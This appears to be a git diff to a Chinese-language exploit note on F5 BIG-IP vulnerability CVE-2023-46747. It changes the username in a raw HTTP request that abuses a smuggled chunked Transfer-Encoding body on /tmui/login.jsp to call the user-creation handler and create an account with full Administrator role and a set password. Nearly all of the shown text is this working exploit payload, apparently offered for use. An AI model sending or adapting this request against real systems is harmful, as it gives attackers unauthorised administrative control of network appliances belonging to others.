diff --git a/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md b/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md index e0c3107..2c363d6 100644 --- a/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md +++ b/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md @@ -44,7 +44,7 @@ modify auth user admin password admin 当发送到F5 BIG-IP TMUI模块的请求(例如登陆页面/tmui/login.jsp)中,包含一个类似值为 "xxx, chunked" 的 "Transfer-Encoding" 头,并且请求体内容满足特定内容时,漏洞会被触发。 -&name=admin&name_before=&passwd=admin789456 参数填入账户密码 +&name=adminqq&name_before=&passwd=admin789456 参数填入创建账户 ``` POST /tmui/login.jsp HTTP/1.1 @@ -54,7 +54,7 @@ Content-Type: application/x-www-form-urlencoded 204 HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP Tmui-Dubbuf BBBBBBBBBBB -REMOTEROLE0� localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=admin&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=� +REMOTEROLE0� localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=adminqq&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=� 0 ```